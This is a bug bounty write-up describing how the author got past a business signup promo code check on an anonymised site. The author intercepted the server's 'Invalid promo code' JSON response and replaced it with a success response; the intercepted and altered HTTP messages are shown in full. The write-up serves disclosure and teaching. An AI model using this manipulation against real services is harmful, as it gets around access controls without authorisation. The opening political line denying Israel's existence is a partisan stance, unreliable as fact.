Bypassing Promo Code Validation via Response Manipulation Enabled the Creation of a Business Account.
.بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ، وَالصَّلَاةُ وَالسَّلَامُ عَلَىٰ رَسُولِ اللَّهِ
We Stand with Palestine and don’t recognize a country called Israel.
Hi everyone, I’m a web penetration tester, and a part-time bug bounty hunter on HackerOne and BugCrowd.
What is response manipulation?
Response manipulation involves intercepting and altering the server’s response to a client request in order to modify the application’s behavior. By changing data such as status codes or error messages, an attacker can bypass security checks, gain unauthorized access, or manipulate functionality to achieve unintended outcomes. This technique is often used in penetration testing to exploit vulnerabilities in web applications.
Explanation
Since the bug is not yet resolved and it’s a private bug bounty program, I will refer to the platform as example.com
. Let’s now explain the functionality behind creating a business account.
While creating a normal account, I encountered a registration form that allowed me to create a business account using a valid email and password.
The form then required additional information to complete the registration, including First Name
, Last Name
, and Phone Number
.
After clicking Continue, it asked for Company Name
, Number of Employees
, and a promo code
.
However, it checked the promo code’s validity, and I had no idea how to submit a valid one. I thought it might be related to the company name, but that was also invalid.
So, I decided to intercept the request, and here’s what I found:
POST /endpoint HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/
Content-Type: application/json
Content-Length: 89
Origin: https://example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
{
"company_name":"My Company",
"country_code":"eg",
"headcount":"tier4",
"promo_code":"fake promo code"
}
I sent it to the repeater and noticed that the response included an Invalid promo code
message in JSON format, as shown below:
HTTP/2 200 OK
Date: Sat, 17 Aug 2024 19:57:38 GMT
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Etag: W/"be-Sc9u0CHJJHAEh+ZtGA31AI1GWck"Vary: Accept-Encoding
Cf-Cache-Status: DYNAMICSet-Cookie: __cf_bm=<String>; path=/; expires=Sat, 17-Aug-24 20:27:38 GMT; domain=.redacted.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 8b4c3bfdfd680dbf-MRS
Alt-Svc: h3=":443"; ma=86400
{
"code":56801,
"message":"BUSINESS_SIGNUP_COMPANY_DATA_INVALID_REQUEST",
"error_data":{
"text":"Validation errors",
"validation_errors":[
{
"error":"Invalid promo code",
"property":"promo_code"
}
]
}
}
I thought about manipulating the response to bypass the error. I intercepted the request, selected Do Intercept
, and choose Response to this request
. Then, I modified the response as follows:
HTTP/2 200 OK
Date: Sat, 17 Aug 2024 19:57:38 GMT
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Etag: W/"be-Sc9u0CHJJHAEh+ZtGA31AI1GWck"Vary: Accept-Encoding
Cf-Cache-Status: DYNAMICSet-Cookie: __cf_bm=<String>; path=/; expires=Sat, 17-Aug-24 20:27:38 GMT; domain=.example.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 8b4c3bfdfd680dbf-MRS
Alt-Svc: h3=":443"; ma=86400
{
"code":0,
"message":"OK"
}
Oops, I successfully bypassed it and created the account.